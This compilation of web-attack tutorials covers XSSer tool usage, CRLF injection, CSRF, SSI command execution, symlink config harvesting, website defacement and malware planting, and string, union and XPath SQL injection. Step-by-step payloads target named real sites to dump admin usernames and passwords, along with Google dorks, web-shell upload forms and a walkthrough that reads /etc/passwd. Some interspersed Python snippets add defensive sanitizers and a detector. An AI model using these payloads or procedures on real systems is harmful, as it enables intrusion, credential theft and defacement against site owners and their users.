--Xsa XSA - Cross Site Agent Scripting
--Xsr XSR - Cross Site Referer Scripting
--Dcp DCP - Data Control Protocol injections
--Dom DOM - Use Anchor Stealth (DOM shadows!)
--Ind IND - HTTP Response Splitting Induced code
--Anchor ANC - Use Anchor Stealth payloader (DOM shadows!)

*Select Final injection(s)*:
These options can be used to specify the final code to inject in vulnerable target(s). Important, if you want to exploit on-the-wild your discovered vulnerabilities. Choose only one option:
--Fp=FINALPAYLOAD OWN - Insert your final code to inject -manually-
--Fr=FINALREMOTE REMOTE - Insert your final code to inject -remotely-
--Doss DOSs - XSS Denial of service (server) injection
--Dos DOS - XSS Denial of service (client) injection
--B64 B64 - Base64 code encoding in META tag (rfc2397)

*Special Final injection(s)*:
These options can be used to execute some 'special' injection(s) in vulnerable target(s). You can select multiple and combine with your final code (except with DCP code):
--Onm ONM - Use onMouseMove() event to inject code
--Ifr IFR - Use "iframe" source tag to inject code

*Miscellaneous*:
--silent inhibit console output results
--update check for XSSer latest stable version
--save output all results directly to template (XSSlist.dat)
--xml=FILEXML output 'positives' to a XML file (--xml filename.xml)
--publish output 'positives' to Social Networks (identi.ca)
--short=SHORTURLS display -final code- shortened (tinyurl, is.gd)
--launch launch a browser at the end with each XSS discovered

Examples:

* Simple injection from URL:
$ python xsser.py -u "http://host.com"
-------------------
* Simple injection from File, with tor proxy and spoofing HTTP Referer headers:
$ python xsser.py -i "file.txt" --proxy "http://127.0.0.1:8118" --referer "666.666.666.666"
-------------------
* Multiple injections from URL, with automatic payloading, using tor proxy, injecting on payloads character encoding in "Hexadecimal", with verbose output and saving results to file (XSSlist.dat):
$ python xsser.py -u "http://host.com" --proxy "http://127.0.0.1:8118" --auto --Hex --verbose -w
-------------------
* Multiple injections from URL, with automatic payloading, using character encoding mutations (first, change payload to hexadecimal; second, change to StringFromCharCode the first encoding; third, reencode to Hexadecimal the second encoding), with HTTP User-Agent spoofed, changing timeout to "20" and using multithreads (5 threads):
$ python xsser.py -u "http://host.com" --auto --Cem "Hex,Str,Hex" --user-agent "XSSer!!" --timeout "20" --threads "5"
-------------------
* Advanced injection from File, payloading your -own- payload and using Unescape() character encoding to bypass filters:
$ python xsser.py -i "urls.txt" --payload 'a="get";b="URL("";c="javascript:";d="alert('XSS');")";eval(a+b+c+d);' --Une
-------------------
* Injection from Dork selecting "duck" engine (XSSer Storm!):
$ python xsser.py --De "duck" -d "search.php?"
-------------------
* Injection from Crawler with deep 3 and 4 pages to see (XSSer Spider!):
$ python xsser.py -c 3 --Cw=4 -u "http://host.com"
-------------------
* Simple injection from URL, using POST, with statistics results:
$ python xsser.py -u "http://host.com" -p "index.php?target=search&subtarget=top&searchstring=" -s
-------------------
* Multiple injections from URL to a parameter sending with GET, using automatic payloading, with IP Octal payloading obfuscation and printing results in a "tinyurl" shortened link (ready for share!):
$ python xsser.py -u "http://host.com" -g "bs/?q=" --auto --Doo --short tinyurl
-------------------
* Simple injection from URL, using GET, injecting a vector in Cookie parameter, trying to use a DOM shadow space (no server logging!) and if exists any "hole", applying your manual final payload "malicious" code (ready for real attacks!):
$ python xsser.py -u "http://host.com" -g "bs/?q=" --Coo --Dom --Fr="!enter your final injection code here!"
-------------------
* Simple injection from URL, using GET and trying to generate with results a "malicious" shortened link (is.gd) with a valid DoS (Denial Of Service) browser client payload:
$ python xsser.py -u "http://host.com" -g "bs/?q=" --Dos --short "is.gd"
-------------------
* Multiple injections to multiple places, extracting targets from a list in a FILE, applying automatic payloading, changing timeout to "20" and using multithreads (5 threads), increasing delay between requests to 10 seconds, injecting parameters in HTTP User-Agent, HTTP Referer and in Cookie parameters, using proxy Tor, with IP Octal obfuscation, with statistics results, in verbose mode and creating shortened links (tinyurl) of any valid injecting payloads found (real playing mode!):
$ python xsser.py -i "list_of_url_targets.txt" --auto --timeout "20" --threads "5" --delay "10" --Xsa --Xsr --Coo --proxy "http://127.0.0.1:8118" --Doo -s --verbose --Dos --short "tinyurl"
-------------------
* Injection of user XSS vector directly in a malicious -fake- image created "on the wild", and ready to be uploaded.
$ python xsser.py --Imx "test.png" --payload "!enter your malicious injection code here!"
-------------------
* Report output 'positives' injections of a dorking search (using "ask" dorker) directly to a XML file.
$ python xsser.py -d "login.php" --De "ask" --xml "security_report_XSSer_Dork_cuil.xml"
-------------------
* Publish output 'positives' injections of a dorking search (using "duck" dorker) directly to http://identi.ca (federated XSS pentesting botnet)
$ python xsser.py -d "login.php" --De "duck" --publish
-------------------
* Create a .swf movie with XSS code injected
$ python xsser.py --fla "name_of_file"
-------------------
* Send a pre-checking hash to see if target will generate -false positive- results
$ python xsser.py -u "host.com" --hash
-------------------
* Multiple fuzzing injections from url, including DCP injections and exploiting our "own" code, spoofed in a shortened link, on positive results found. XSS real-time exploiting.
$ python xsser.py -u "host.com" --auto --Dcp --Fp "enter_your_code_here" --short "is.gd"
-------------------
* Exploiting Base64 code encoding in META tag (rfc2397) in a manual payload of a vulnerable target.
$ python xsser.py -u "host.com" -g "vulnerable_path" --payload "valid_vector_injected" --B64
-------------------
* Exploiting our "own" -remote code- in a payload discovered using fuzzing and launching it in a browser directly
$ python xsser.py -u "host.com" -g "vulnerable_path" --auto --Fr "my_host/path/code.js" --launch
CRLF :

1) CRLF?

Short for Carriage Return and Line Feed (\r\n). CRLF injection is very easy to use: it is like adding a new row (\n) to whatever the application writes, so we can forge a line that looks as if someone else wrote it.

2) Vulnerable places

Anywhere the application writes user input into a line-oriented format (chat logs, log files, HTTP headers...). In this tutorial I'm going to use a chat.

3) Exploiting vulnerability and protection

Let's say we send a message; the chat looks like this:
Code:
1.4.2012 10:29 - fodex: Why login page is down?
1.4.2012 10:29 - saiR: Look like somebody deleted login database.
1.4.2012 10:29 - Admin: I'm gonna check this out and will announce you.
1.4.2012 10:30 - saiR: Ok go ahead...\n1.4.2012 10:30 - Admin: You are right saiR login database is deleted. Log in here till I get it back: http://vulnerablesite.com/login.php
If the chat is vulnerable, it is going to look like this:
Code:
1.4.2012 10:30 - saiR: Ok go ahead...
1.4.2012 10:30 - Admin: You are right saiR login database is deleted. Log in here till I get it back: http://vulnerablesite.com/login.php
We wrote the second message "from Admin" ourselves, but users will think the Admin sent it and will log in to the site we gave them. With that login page we keylog the site logins.

4) Vulnerable script

e.g.
Code:
<?php
if(isset($_POST['send_message']))
{
  if(!empty($_POST['message']))
  {
    // htmlspecialchars() encodes < > & " (and ' depending on flags) but leaves
    // \r and \n untouched, so the newline reaches the chat log and starts a new line.
    $message = htmlspecialchars($_POST['message']);
    // rest of the code to send the msg
  }
}
?>
The fix is to strip or replace \r and \n in $message (or any other control character that breaks a line) before it is written, in addition to the HTML escaping.
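To make the chat example concrete, here is the vulnerable renderer next to a hardened one, as an added Python example rather than code from the tutorial. render_vulnerable mirrors the PHP above (HTML escaping only); render_hardened removes every line-breaking character first. The attacker message and the chat line format are constructed from the example above; lines_attributed_to shows what a reader of the log would believe.

```python
"""CRLF injection into a line-oriented chat log: vulnerable renderer beside a hardened one."""
import html
import re

# "1.4.2012 10:30 - saiR: message" -> (timestamp, author); author ends at the first colon.
LINE_START = re.compile(r"^(\S+ \S+) - ([^:]+): ")
# CR, LF and the other characters browsers/terminals may treat as line breaks.
LINE_BREAKS = re.compile(r"[\r\n\x0b\x0c\x85\u2028\u2029]+")


def render_vulnerable(stamp: str, author: str, message: str) -> str:
    """Mirrors the PHP chat: htmlspecialchars() only. html.escape encodes < > & " '
    but leaves \\r and \\n untouched, so a newline in the message starts a new chat line."""
    return f"{stamp} - {author}: {html.escape(message, quote=True)}"


def sanitize_message(message: str) -> str:
    """Collapse every line-breaking character to a space before the message is
    written, so user text can never start a new line of the log."""
    return LINE_BREAKS.sub(" ", message)


def render_hardened(stamp: str, author: str, message: str) -> str:
    return f"{stamp} - {author}: {html.escape(sanitize_message(message), quote=True)}"


def lines_attributed_to(rendered: str, author: str) -> int:
    """How many chat lines a reader would attribute to `author`."""
    count = 0
    for line in rendered.splitlines():
        m = LINE_START.match(line)
        if m and m.group(2) == author:
            count += 1
    return count


# Constructed attacker message: a second line pretending to come from Admin.
ATTACK = ("Ok go ahead...\n1.4.2012 10:30 - Admin: You are right saiR login database "
          "is deleted. Log in here till I get it back: http://vulnerablesite.com/login.php")

if __name__ == "__main__":
    print(render_vulnerable("1.4.2012 10:30", "saiR", ATTACK))
    print(render_hardened("1.4.2012 10:30", "saiR", ATTACK))
```

The same sanitize step is what you want before writing user input into HTTP headers or log files; the difference is only which characters count as a line break in that format.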
CSRF :

1) CSRF?

Short for Cross Site Request Forgery. CSRF makes the victim's browser send a request to the target site; the browser attaches the victim's session cookie automatically, so the request is executed with the victim's rights without the attacker knowing the username or password. It is often combined with XSS, but it is a separate bug: the site trusts a request just because it carries a valid session.

2) Vulnerable places

The easiest case is when a state-changing action is done with the GET method (a plain URL), because then any <img src=...> pointing at that URL triggers it. If the CSRF succeeds, the attacker can change another user's password. The most common vulnerable places are avatars and other fields that accept an image URL: every user who views the avatar makes their browser fetch the attacker's URL with their own cookies.

3) Exploiting vulnerability

Let's say we have the profile link:
Code:
http://www.link.com/profile.php
where you can see user data (username, avatar, email...). A user edits his profile using e.g.
Code:
http://www.link.com/edit_profile.php
Now instead of an avatar link we add the profile editing link together with the new value, passed with the GET method.
NOTE: the profile editing has to accept the GET method, otherwise we won't be able to attack.
Add as avatar link:
Code:
http://www.link.com/edit_profile.php?password=newpassword
password is the name of the input (it can be different; it's best to check the source code).
Now when we look at the avatar we won't see a picture (as if there is none). When another user views your avatar, if the attack was successful, his password is changed to the one we put in the URL.

4) Example Of CSRF File Uploading Vulnerability.
1. Wordpress Amplus Themes CSRF File Upload Vulnerability
2. Wordpress Dimension Themes CSRF File Upload Vulnerability
3. Wordpress Euclid V1 Themes CSRF File Upload Vulnerability
4. Wordpress thecotton v114 Themes CSRF File Upload Vulnerability
1. Wordpress Amplus Themes CSRF File Upload Vulnerability
Dork: inurl:wp-content/themes/amplus
Exploit & POC: http://site-target/wp-content/themes/amplus/functions/upload-handler.php
Script:
Code:
<form enctype="multipart/form-data" action="http://127.0.0.1/wp-content/themes/amplus/functions/upload-handler.php" method="post">
Your File: <input name="uploadfile" type="file" /><br/>
<input type="submit" value="upload" />
</form>
File Access: http://site-target/wp-content/uploads/[year]/[month]/your_shell.php
Example: http://127.0.0.1/wp-content/uploads/2013/11/devilscream.php

2. Wordpress Dimension Themes CSRF File Upload Vulnerability
Dork: inurl:wp-content/themes/dimension
Exploit & POC: http://site-target/wp-content/themes/dimension/library/includes/upload-handler.php
Script:
Code:
<form enctype="multipart/form-data" action="http://127.0.0.1/wp-content/themes/dimension/library/includes/upload-handler.php" method="post">
Your File: <input name="uploadfile" type="file" /><br/>
<input type="submit" value="upload" />
</form>
File Access: http://site-target/wp-content/uploads/[year]/[month]/your_shell.php
Example: http://127.0.0.1/wp-content/uploads/2013/11/devilscream.php

3. Wordpress Euclid Themes CSRF File Upload Vulnerability
Dork: inurl:wp-content/themes/euclid_v1
Exploit & POC:
http://site-target/wp-content/themes/euclid/functions/upload-handler.php
http://site-target/wp-content/themes/euclid_v1.x.x/functions/upload-handler.php
Script:
Code:
<form enctype="multipart/form-data" action="http://127.0.0.1/wp-content/themes/euclid/functions/upload-handler.php" method="post">
Your File: <input name="uploadfile" type="file" /><br/>
<input type="submit" value="upload" />
</form>
File Access: http://site-target/wp-content/uploads/[year]/[month]/your_shell.php
Example: http://127.0.0.1/wp-content/uploads/2013/11/devilscream.php

4. Wordpress theCotton Themes CSRF File Upload Vulnerability
Dork: inurl:wp-content/themes/thecotton_v114/
Exploit & POC: http://site/[path]/wp-content/themes/thecotton_v114/lib/utils/upload-handler.php
Script:
Code:
<form enctype="multipart/form-data" action="http://127.0.0.1/wp-content/themes/thecotton_v114/lib/utils/upload-handler.php" method="post">
Your File: <input name="uploadfile" type="file" /><br/>
<input type="submit" value="upload" />
</form>
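The avatar trick in the CSRF section above works because edit_profile.php accepts a GET with only a session cookie as proof. The following added Python example (not code from the tutorial) models that handler next to a hardened one and replays the attack against both. The site name, session ids, the Request class and the handlers are constructed for the example; the hardened version requires POST, a per-session HMAC token the attacker's page cannot read, and a same-origin Origin/Referer. Note that the Referer check alone would not stop the avatar variant, because the image is loaded from the site's own profile page.

```python
"""CSRF via a GET state change (the avatar trick) beside a hardened handler."""
import hashlib
import hmac
import secrets
from dataclasses import dataclass, field
from urllib.parse import urlsplit

# Hypothetical site and per-deployment key; in production the key comes from configuration.
SITE_ORIGIN = "https://www.link.com"
TOKEN_KEY = secrets.token_bytes(32)


@dataclass
class Request:
    method: str
    params: dict
    cookies: dict
    headers: dict = field(default_factory=dict)


def csrf_token(session_id: str) -> str:
    """Token bound to the session id via HMAC, so it cannot be guessed or forged."""
    return hmac.new(TOKEN_KEY, session_id.encode(), hashlib.sha256).hexdigest()


def change_password_vulnerable(req: Request, sessions: dict, users: dict) -> int:
    """Like edit_profile.php?password=...: any request carrying a valid session
    cookie changes the password, even a GET fired by an <img src>."""
    user = sessions.get(req.cookies.get("PHPSESSID"))
    if user is None:
        return 403
    users[user] = req.params["password"]
    return 200


def change_password_hardened(req: Request, sessions: dict, users: dict) -> int:
    sid = req.cookies.get("PHPSESSID")
    user = sessions.get(sid)
    if user is None:
        return 403
    if req.method != "POST":                      # an <img>/<iframe> can only issue a GET
        return 405
    if not hmac.compare_digest(req.params.get("csrf_token", ""), csrf_token(sid)):
        return 403                                # attacker's page cannot read the token
    origin = req.headers.get("Origin") or req.headers.get("Referer", "")
    if urlsplit(origin).netloc != urlsplit(SITE_ORIGIN).netloc:
        return 403
    users[user] = req.params["password"]
    return 200


def avatar_attack(handler):
    """Constructed victim state plus the request the victim's browser makes when it
    renders the attacker's "avatar" <img src="edit_profile.php?password=newpassword">."""
    sessions = {"db3e4e100ab6bb912de1b80c4eed7898": "victim"}
    users = {"victim": "oldpassword"}
    req = Request(
        method="GET",
        params={"password": "newpassword"},
        cookies={"PHPSESSID": "db3e4e100ab6bb912de1b80c4eed7898"},
        # image loads carry no Origin header; the Referer is the site's own profile page
        headers={"Referer": f"{SITE_ORIGIN}/profile.php"},
    )
    return handler(req, sessions, users), users["victim"]


def legitimate_change(handler):
    """The real profile form: POST, with the token the server put in the page."""
    sessions = {"sid1": "victim"}
    users = {"victim": "oldpassword"}
    req = Request("POST", {"password": "newpassword", "csrf_token": csrf_token("sid1")},
                  {"PHPSESSID": "sid1"}, {"Origin": SITE_ORIGIN})
    return handler(req, sessions, users), users["victim"]


if __name__ == "__main__":
    print("vulnerable:", avatar_attack(change_password_vulnerable))
    print("hardened:  ", avatar_attack(change_password_hardened))
```

The method check is what defeats the avatar vector specifically; the token is what defeats a forged POST from an attacker-controlled page, and the origin check is defence in depth for clients that send those headers.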
  • 73.
Server Side Includes | Server Side Inclusion :

1) Introduction Server Side Includes

Server Side Includes (SSI) let us do some things faster on sites: over SSI we can include other files, print environment variables, run commands and more. The web server executes the directives while it serves the page. The default extension for SSI files is .shtml. For SSI to work in the directory where the .shtml file is located, there must be an .htaccess file holding the configuration (or the same settings in the main Apache config; .htaccess only takes effect when AllowOverride permits it). SSI is disabled by default; you can enable it by creating a new .htaccess file with this config:
Code:
AddType text/html .shtml
AddHandler server-parsed .shtml
AddHandler server-parsed .html
Options Indexes FollowSymLinks Includes
The third line makes Apache parse every .html file as well. Options Includes also permits exec; with IncludesNOEXEC instead, include and echo still work but exec does not.

2) SSI creating

A directive starts with <!--# and ends with -->. A simple one looks like this:
<!--#<command> <attribute>="<value>" -->
Code:
<command> - config include flow set printenv echo exec fsize flastmod time & date
Script e.g.
Code:
<!--#include file="yourfilename.txt" -->
<!--#set var="msg" value="This will write this stupid text." --><!--#echo var="msg" -->
(echo prints the value of a variable, so the text has to be put into a variable first, or use a built-in one such as DATE_LOCAL.)

3) Server Side Inclusion

The Server Side Inclusion attack is a very useful attacking method. For this it's recommended to have basic knowledge of Bash and Batch programming.
A site is vulnerable to SSI injection when the extensions .shtml, .shtm or .stm (or .html, as configured above) are handled as server-parsed in the Apache config and we can get our own text into such a page, either by uploading a file or through input the page reflects. e.g. we can create a file with the next command:
Code:
<!--#exec cmd="ls -la" -->
Save this as an .shtml file and open it on the site. I think you already know what is going to happen: the command runs on the server and its output is printed in the page. exec only works when IncludesNOEXEC is not set.
Hope this helped you!
Symlink Attack :

1] Upload your shell, 404.php.
2] Upload contact.php & database.php (the symlink helper scripts):
eg: http://getec.com.ar/wp-content/plugins/akismet/database.php
eg: http://getec.com.ar/wp-content/plugins/akismet/contact.php
3] Go to [sec. info] in your shell, then [readable: /etc/passwd <view>].
4] Copy all usernames from /etc/passwd (the password field there is only a placeholder).
5] Paste them into http://site.com/contact.php, [config fucker] tab.
6] Now open both links: http://site.com/database.php & http://site.com/configweb
eg: http://getec.com.ar/wp-content/plugins/akismet/database.php
eg: http://getec.com.ar/wp-content/plugins/akismet/configweb/
7] On the configweb page you have text that contains users & passwords: these are the config files of the other websites hosted on the same server, reached through the symlinks.
8] Now log in to them using database.php (change the password in the database).
9] Then log in to the main site and deface its index.php page.

Malware Attachment On Website :
1] Go to the public_html tab in your 404.php shell,
2] open .htaccess in your shell
3] and paste your malware code.
Sql injection String & Union based :

1. Sql injection String based

[1] Description
In string based SQL injection the injected value sits inside quotes in the query, so the usual numeric tests don't work:
"order by" doesn't work, example: order by 100--
"group by" doesn't work
"having 1=2" doesn't work
queries related to SQL injection don't work (the site shows a normal page even though it is vulnerable to SQLi)

[2] Example solution to this issue, in order to hack a site with string based SQL injection
The answer to this problem is to use the following format:
http://site.com/index.php?id=10' order by 1000--+
That will show us the error, hence displaying the results according to our query. The point here is that we used the quote ' to close the string, and the + sign (a URL encoded space after --, which MySQL requires for the comment) in our query: id=X' order by--+
Now that you've got the point, let's try string based on some of the other types of SQL injection, shall we?

String-Union Based SQL injection

1. Obtaining the number of columns (in this example, we'll use 10 columns)
http://www.site.com/index.php?id=234' order by 11--+
Results show an error, so we'll assume 10 columns, since it's an example for our process

2. Obtaining the Databases
http://www.site.com/index.php?id=-234' UNION SELECT 1,2,3,4,5,group_concat(schema_name,0x0a),7,8,9,10 from information_schema.schemata--+
Results will display the databases on the site
Note: If you don't know anything about UNION based SQL injection, I suggest you read one of my tutorials to progress further in this step

3. Obtaining the Tables from the current Database
http://www.site.com/index.php?id=-234' UNION SELECT 1,2,3,4,5,group_concat(table_name,0x0a),7,8,9,10 from information_schema.tables where table_schema=database()--+
Results will display the current table names
For this example, we'll be using the table name: "admin"

4. Obtaining Column names from a specific table (which in this example is "admin")
http://www.site.com/index.php?id=-234' UNION SELECT 1,2,3,4,5,group_concat(column_name,0x0a),7,8,9,10 from information_schema.columns where table_name=0x61646d696e--+
Results will display the column names from that table
To convert plain text to hex (0x61646d696e is "admin"), use: http://www.swingnote.com/tools/texttohex.php
For this example, we'll use "username" and "password" as our column names

5. Obtaining Data from Column names
http://www.site.com/index.php?id=-234' UNION SELECT 1,2,3,4,5,group_concat(username,0x3a,password,0x0a),7,8,9,10 from admin--+

6. Example:
1. http://www.onthegro.co.za/content.php?id=latest_news'
2. http://www.onthegro.co.za/content.php?id=latest_news' order by 1000 --+
3. http://www.onthegro.co.za/content.php?id=latest_news' order by 1 --+
4. http://www.onthegro.co.za/content.php?id=latest_news' order by 2 --+
5. http://www.onthegro.co.za/content.php?id=latest_news' order by 3 --+
6. http://www.onthegro.co.za/content.php?id=latest_news' order by 4 --+
7. http://www.onthegro.co.za/content.php?id=-latest_news' union select 1,2,3,4 --+
8. http://www.onthegro.co.za/content.php?id=-latest_news' union select 1,2,group_concat(schema_name,0x0a),4 from information_schema.schemata --+
9. http://www.onthegro.co.za/content.php?id=-latest_news' union select 1,2,group_concat(table_name,0x0a),4 from information_schema.tables where table_schema=database()--+
10. http://www.onthegro.co.za/content.php?id=-latest_news' union select 1,2,group_concat(column_name,0x0a),4 from information_schema.columns where table_name=0x61646d696e--+
11. http://www.onthegro.co.za/content.php?id=-latest_news' union select 1,2,group_concat(username,0x3a,password,0x0a),4 from admin--+

2. Sql injection Union based :

[1] Example http://www.naukriguru.com
(Steps 11, 12 and 16 below are typos that the following step corrects; the column count is narrowed down by bisection with order by.)
1. http://www.naukriguru.com/jobseeker/job-display-walk-in.php?id=98 order by 100
2. http://www.naukriguru.com/jobseeker/job-display-walk-in.php?id=98 order by 10
3. http://www.naukriguru.com/jobseeker/job-display-walk-in.php?id=98 order by 20
4. http://www.naukriguru.com/jobseeker/job-display-walk-in.php?id=98 order by 50
5. http://www.naukriguru.com/jobseeker/job-display-walk-in.php?id=98 order by 40
6. http://www.naukriguru.com/jobseeker/job-display-walk-in.php?id=98 order by 30
7. http://www.naukriguru.com/jobseeker/job-display-walk-in.php?id=98 order by 35
8. http://www.naukriguru.com/jobseeker/job-display-walk-in.php?id=98 order by 33
9. http://www.naukriguru.com/jobseeker/job-display-walk-in.php?id=98 order by 32
10. http://www.naukriguru.com/jobseeker/job-display-walk-in.php?id=98 order by 31
11. http://www.naukriguru.com/jobseeker/job-display-walk-in.php?id=98 union select by 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31
12. http://www.naukriguru.com/jobseeker/job-display-walk-in.php?id=98 union select by 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31--
13. http://www.naukriguru.com/jobseeker/job-display-walk-in.php?id=98 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31--
14. http://www.naukriguru.com/jobseeker/job-display-walk-in.php?id=-98 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31--
15. http://www.naukriguru.com/jobseeker/job-display-walk-in.php?id=-98 union select 1,2,@@version,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31--
16. http://www.naukriguru.com/jobseeker/job-display-walk-in.php?id=-98 union select 1,2,group_concat,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31--
17. http://www.naukriguru.com/jobseeker/job-display-walk-in.php?id=-98 union select 1,2,group_concat(database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31--
18. http://www.naukriguru.com/jobseeker/job-display-walk-in.php?id=-98 union select 1,2,group_concat(database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31--
19. http://www.naukriguru.com/jobseeker/job-display-walk-in.php?id=-98 union select 1,2,group_concat(table_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 from information_schema.tables where table_schema = database()--
20. http://www.naukriguru.com/jobseeker/job-display-walk-in.php?id=-98 union select 1,2,group_concat(column_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 from information_schema.columns where table_name = 0x6e675f61646d696e--
21. http://www.naukriguru.com/jobseeker/job-display-walk-in.php?id=-98 union select 1,2,group_concat(id,0x3a,loginid,0x3a,email,0x3a,password,0x3a,name,0x3a,type,0x3a),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 from ng_admin--
22. http://www.naukriguru.com/admin/
23. http://www.naukriguru.com/admin/index.php#
24. http://www.naukriguru.com/admin/add_industry.php
(0x6e675f61646d696e is the hex of "ng_admin".)
Xpath Injection :

Step 1:
Inject --> +and extractvalue(rand(),concat(0x0a,version()))--
Eg: http://www.viratcooker.com/recipe.php?ID=3+and%20extractvalue(rand(),/*!concat*/(0x0a,version()))--
msg: Could not query:XPATH syntax error: ' 5.5.32-cll'

=====================================================================

Step 2: [Find Tables]
Inject --> +and extractvalue(rand(),concat(0x0a,(select concat(0x3a,table_name) from information_schema.tables WHERE table_schema=database() limit 0,1)))--+
Eg: www.viratcooker.com/recipe.php?ID=3+and extractvalue(rand(),/*!concat*/(0x0a,(/*!select*/ /*!concat*/(0x3a,table_name) from /*!information_schema.tables*/ /*!WHERE*/ /*!table_schema=database()*/ limit 0,1)))--+
msg: Could not query:XPATH syntax error: ' :RecipeIngredients'

Note : Set [ limit 0,1 ] in the above query to 1,2,3,4...
Eg: www.viratcooker.com/recipe.php?ID=3+and extractvalue(rand(),/*!concat*/(0x0a,(/*!select*/ /*!concat*/(0x3a,table_name) from /*!information_schema.tables*/ /*!WHERE*/ /*!table_schema=database()*/ limit 1,1)))--+
msg: Could not query:XPATH syntax error: ' :SS_categories'

Respectively, for 2,3,4,5,6,7,8... the messages are:
Could not query:XPATH syntax error: ' :SS_ordered_carts'
Could not query:XPATH syntax error: ' :SS_orders'
Could not query:XPATH syntax error: ' :SS_products'
Could not query:XPATH syntax error: ' :SS_products2'
Could not query:XPATH syntax error: ' :SS_special_offers'
Could not query:XPATH syntax error: ' :categories'
Could not query:XPATH syntax error: ' :details'
Could not query:XPATH syntax error: ' :productrange'
Could not query:XPATH syntax error: ' :recipes'
Could not query:XPATH syntax error: ' :visitors'

=====================================================================
Note : Convert the table name to HEX [String to hex conversion]
Eg : details : 64657461696c73 or 0x64657461696c73
=====================================================================

Step 3: [Finding Columns]
Inject --> +and extractvalue(rand(),concat(0x0a,(select concat(0x3a,column_name) from information_schema.columns WHERE table_name=0x64657461696c73 limit 0,1)))--+
Eg: www.viratcooker.com/recipe.php?ID=3+and extractvalue(rand(),/*!concat*/(0x0a,(/*!select*/ /*!concat*/(0x3a,column_name) from /*!information_schema.columns*/ /*!WHERE*/ /*!column_name=0x64657461696c73*/ limit 0,1)))--+
msg: Could not query:XPATH syntax error: ' :cust_firstname'

Note : Set [ limit 0,1 ] in the above query to 1,2,3,4...
Respectively, for 2,3,4,5,6,7,8... the messages are:
msg: Could not query:XPATH syntax error: ' :cust_lastname'
msg: Could not query:XPATH syntax error: ' :cust_country'
msg: Could not query:XPATH syntax error: ' :cust_zip'
msg: Could not query:XPATH syntax error: ' :cust_state'
msg: Could not query:XPATH syntax error: ' :cust_city
msg: Could not query:XPATH syntax error: ' :cust_address'

=====================================================================
Note : In my case I got :
Table -> users
Columns -> Password & Email
So,
=====================================================================

Step 4: Fetching Details
Inject ---> +and extractvalue(rand(),concat(0x0a,(select concat(email,0x3a,password) from users limit 0,1)))--+
Eg: www.viratcooker.com/recipe.php?ID=3+and extractvalue(rand(),/*!concat*/(0x0a,(/*!select*/ /*!concat*/(email,0x3a,password) from /*!users*/ limit 0,1)))--+
msg: Could not query:XPATH syntax error: ' :email:password'
=====================================================================
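The union-based walkthrough and the extractvalue walkthrough above both leave a recognisable trace in the request: column-count probes, union select with information_schema, and error-based calls wrapped in /*!keyword*/ comments. The following is an added example, not code from the tutorial, that normalises query-string values the way MySQL would see them and triages them for those patterns; the host example.test and all sample URLs are constructed, and the signature names are my own.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote_plus

# Added example: triage of request URLs for the probe patterns shown in the
# union-based and XPath (extractvalue) walkthroughs. All URLs are constructed;
# example.test is a placeholder host.

PROBE_PATTERNS = {
    "order_by_probe": re.compile(r"\border\s+by\s+\d+", re.I),
    "union_select": re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
    "schema_enum": re.compile(r"\binformation_schema\.(tables|columns)\b", re.I),
    "error_based_xpath": re.compile(r"\b(extractvalue|updatexml)\s*\(", re.I),
    "concat_exfil": re.compile(r"\bgroup_concat\s*\(", re.I),
    "comment_terminator": re.compile(r"(--|#|/\*)\s*$"),
}

# MySQL conditional comments such as /*!select*/ or /*!50000select*/ are
# executed by the server, so the keyword inside must survive normalisation.
VERSION_COMMENT = re.compile(r"/\*!\d*\s*(.*?)\s*\*/", re.S)
BLOCK_COMMENT = re.compile(r"/\*.*?\*/", re.S)


def normalise(value: str) -> str:
    """Undo the evasions used on the page: a second round of percent-decoding
    (deliberate, so double-encoded payloads are caught), '+' as space,
    /*!keyword*/ comments unwrapped, plain comments dropped, whitespace
    collapsed."""
    v = unquote_plus(value)
    v = VERSION_COMMENT.sub(r" \1 ", v)
    v = BLOCK_COMMENT.sub(" ", v)
    return re.sub(r"\s+", " ", v).strip()


def inspect_url(url: str) -> dict:
    """Map each query parameter to the signature names it matches.
    An empty dict means nothing looked like a probe."""
    findings = {}
    for name, raw in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        value = normalise(raw)
        hits = [sig for sig, rx in PROBE_PATTERNS.items() if rx.search(value)]
        if hits:
            findings[name] = hits
    return findings


def classify(url: str) -> str:
    """Coarse label for an alert: the most specific technique seen wins."""
    hits = {h for sigs in inspect_url(url).values() for h in sigs}
    if "error_based_xpath" in hits:
        return "error-based (XPath) injection"
    if "union_select" in hits or "schema_enum" in hits:
        return "union-based injection"
    if "order_by_probe" in hits:
        return "column-count probe"
    return "clean"


# Constructed sample requests, one per stage of the walkthroughs above.
SAMPLE_URLS = [
    "http://example.test/job.php?id=98 order by 31",
    "http://example.test/job.php?id=-98 /*!union*/ /*!select*/ 1,2,group_concat(table_name),4 "
    "from information_schema.tables where table_schema=database()--",
    "http://example.test/recipe.php?ID=3+and%20extractvalue(rand(),/*!concat*/(0x0a,version()))--",
    "http://example.test/job.php?id=98&page=2",
]

if __name__ == "__main__":
    for url in SAMPLE_URLS:
        print(f"{classify(url):30} {inspect_url(url)}")
```

The normalisation step matters more than the signatures: without unwrapping /*!select*/ the second sample URL contains no "union select" at all, which is exactly why the page's examples are written that way. The other half of the defence is on the application side: the "Could not query: XPATH syntax error" messages the walkthrough reads table names out of only exist because raw database errors are echoed to the client.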
  • 83.
